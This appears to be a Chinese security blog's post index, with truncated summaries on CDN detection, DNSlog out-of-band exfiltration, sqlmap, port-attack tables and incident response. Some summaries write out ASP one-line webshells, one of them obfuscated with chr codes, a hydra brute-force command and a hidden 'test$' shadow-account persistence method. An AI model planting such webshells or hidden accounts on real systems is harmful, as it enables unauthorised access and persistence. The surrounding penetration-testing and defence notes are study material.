摘要: 判断ip是否为网站真实ip Nslookup: Win下使用nslookup命令进行查询,若返回域名解析结果为多个ip,多半使用了CDN,是不真实的ip: 多地ping查询: 使用不同区域ping,查看ping的ip结果是否唯一。若不唯一,则目标网站可能存在CDN。 https://asm.ca.c 阅读全文
posted @ 2023-10-06 00:55 田家少闲月- 阅读(461) 评论(0) 推荐(0) 编辑
摘要: 在某些情况下,无法利用漏洞获得回显。但是,如果目标可以发送DNS请求,则可以通过DNS log方式将想获得的数据外带出来。 DNS log常用于以下情况: SQL盲注 无回显的命令执行 无回显的SSRF 网上公开提供dnslog服务有很多,比如dnslog.cn、知道创宇、三叶草等等,但是这些提供的 阅读全文
posted @ 2023-10-06 00:00 田家少闲月- 阅读(144) 评论(0) 推荐(0) 编辑
摘要: 安装步骤 卸载旧版本 进入centos系统root执行以下命令(\ 是linux系统种命令换行符,如果命令过长,可以用\来换行) yum remove docker \ docker-client \ docker-client-latest \ docker- common \ docker-la 阅读全文
posted @ 2023-10-05 23:47 田家少闲月- 阅读(41) 评论(0) 推荐(0) 编辑
摘要: 搭建msf 官方有提供一键安装脚本,如下: curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate 阅读全文
posted @ 2023-10-05 23:19 田家少闲月- 阅读(181) 评论(0) 推荐(0) 编辑
摘要: 端口范围 一般用到的是1到65535,其中0一般不使用。端口号可分为3大类:1、公认端口(Well Known Ports):从0到1023,它们紧密绑定(binding)于一些服务。通常这些端口的通讯明确表明了某种服务的协议。例如:80端口实际上总是HTTP通讯。2、注册端口(Registered 阅读全文
posted @ 2023-10-05 23:04 田家少闲月- 阅读(1162) 评论(0) 推荐(0) 编辑
摘要: 排查方法 挖矿病毒被植入主机后,利用主机的运算力进行挖矿,主要体现在CPU使用率高达90%以上,有大量对外进行网络连接的日志记录。 Linux主机中挖矿病毒后的现象如下图所示: Windows主机中挖矿病毒后的现象如下图所示: 处置方法 一旦发现主机或服务器存在上述现象,则极有可能已经感染了挖矿病毒 阅读全文
posted @ 2023-10-05 22:59 田家少闲月- 阅读(456) 评论(0) 推荐(0) 编辑
摘要: sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。 sqlmap目前最新版本为1. 阅读全文
posted @ 2023-10-05 22:36 田家少闲月- 阅读(1381) 评论(0) 推荐(0) 编辑
摘要: 1.系统 uname -a查看内核/操作系统/CPU信息head -n 1 /etc/issue查看操作系统版本cat /proc/cpuinfo查看CPU信息hostname查看计算机名lspci -tv列出所有PCI设备lsusb -tv列出所有USB设备lsmod列出加载的内核模块env查看环 阅读全文
posted @ 2023-10-02 17:24 田家少闲月- 阅读(1057) 评论(0) 推荐(0) 编辑
摘要: 端口列举: 端口服务入侵方式 21 ftp/tftp/vsftpd文件传输协议 爆破/嗅探/溢出/后门 22 ssh远程连接 爆破/openssh漏洞 23 Telnet远程连接 爆破/嗅探/弱口令 25 SMTP邮件服务 邮件伪造 53 DNS域名解析系统 域传送/劫持/缓存投毒/欺骗 67/68 阅读全文
posted @ 2023-10-02 16:58 田家少闲月- 阅读(418) 评论(0) 推荐(1) 编辑
摘要: Cascading Style Sheets(CSS) 1.CSS就是在HTML文档中,如何显示HTML标签,元素,以及他们的样式布局,前端页面的展示形式均由CSS来布局. 2.如何使用CSS 内部样式表 head标签里<style></style> 内联样式,在HTML标签里面直接写style 外 阅读全文
posted @ 2023-03-10 19:51 田家少闲月- 阅读(173) 评论(0) 推荐(0) 编辑
摘要: ASP一句话: <%execute(request("aaa"))%> <%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("a"))%><%eval request("aaa")%> PHP一句话 阅读全文
posted @ 2023-03-10 10:16 田家少闲月- 阅读(193) 评论(0) 推荐(0) 编辑
摘要: 1.hydra[海德拉]: 密码能否被破解,关键取决于字典是否强大, 使用: hydra -L user -P passlist.txt ftp://192.168.0.1 暴力破解的防御 useradd shell #对于不需要登录的用户,在新建用户的时候可以加入" -s /sbin/nologi 阅读全文
posted @ 2023-03-10 10:11 田家少闲月- 阅读(184) 评论(0) 推荐(0) 编辑
摘要: 1.CentOS 安装和卸载Python3 卸载python3 rpm -qa|grep python3|xargs rpm -ev --allmatches --nodeps 卸载pyhton3 whereis python3 |xargs rm -frv 删除所有残余文件 whereis pyt 阅读全文
posted @ 2023-03-07 15:42 田家少闲月- 阅读(42) 评论(0) 推荐(0) 编辑
摘要: 拖库个人防范策略及技术 分级管理密码,涉及隐私的,一账号一密码,密码无关联 使用强密码,至少14位,字母大小写组合 定期修改密码 邮箱不宜注册为网络账号 不让计算机自动保存密码,不随意在第三方网站输入自己的密码 安装杀毒软件和防火墙 公司网站拖库安全防范 可以通过数据库安全防护技术解决,数据库安全技 阅读全文
posted @ 2022-09-25 20:32 田家少闲月- 阅读(39) 评论(0) 推荐(0) 编辑
摘要: 信息搜集 一般企业级的操作,就是先用扫描器扫描 IBM Appscan HP Weblnspect 启明星辰 天镜 安恒 明鉴 绿盟 远程安全评估系统(WVSS/RSAS) 其他 Nmap等 DNS域传送漏洞(域名探测的过程) 根据主域名,可获得二级域名,三级域名 Kali内置的DNS的枚举器 dn 阅读全文
posted @ 2022-09-25 20:31 田家少闲月- 阅读(88) 评论(0) 推荐(0) 编辑
摘要: 数据库基本操作1.数据库基本操作命令(1).显示所有数据库并查询当前使用的数据库show databases; //显示所有的数据库select databases(); //查询当前使用的数据库(2).创建数据库create [数据库名称];(3).选择数据库use [数据库名称];(4).直接删 阅读全文
posted @ 2022-09-25 20:27 田家少闲月- 阅读(285) 评论(0) 推荐(0) 编辑
摘要: 影子账户 创建隐藏账户的方式: 创建一个隐藏账户"net user test$ password /add",隐藏账户无法使用"net user"命令查看,但是可以在"本地用户和组"里面查看。 打开注册表"HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/User 阅读全文
posted @ 2022-09-25 20:25 田家少闲月- 阅读(375) 评论(0) 推荐(0) 编辑
摘要: 为了应各种意外事件,保证将损失降到最低,事件的主题可能来自自然界、系统自身故障,组织内部或外部的人、计算机病毒或蠕虫等 应急响应的三要素: 信息系统的重要程度 信息系统的损失程度 事件的影响 应急响应的管理六要素: 提供解决方案 对系统进行查漏补缺 明确司法途径 明确应急的意图 还原攻击 保障业务的 阅读全文
posted @ 2022-09-25 20:22 田家少闲月- 阅读(152) 评论(0) 推荐(0) 编辑
摘要: IP及版本 IP地址 版本信息 系统内核版本 系统发行版本 ARP ARP表 ARP攻击 端口情况 开放端口 TCP开放端口 UDP开放端口 TCP高危端口 UDP高危端口 网络连接 网卡模式 自启动项 用户自定义启动项 系统自启动项 定时任务 系统定时任务 时间看系统定时任务 分析可疑系统定时任务 阅读全文
posted @ 2022-09-25 20:09 田家少闲月- 阅读(34) 评论(0) 推荐(0) 编辑
摘要: 总体的信息收集思路:先被动信息收集,最开始的收集域名,接着查询IP,域名反查IP,天眼查,微博/人人/QQ,紧接着查询端口,对应端口的Banner,端口对应的服务,接着收集web的Banner,分析Web是什么语言写的,什么框架,这些框架存在什么漏洞,分析WEB架构,分析URL的逻辑,看URL的命令 阅读全文
posted @ 2022-09-16 17:29 田家少闲月- 阅读(158) 评论(0) 推荐(0) 编辑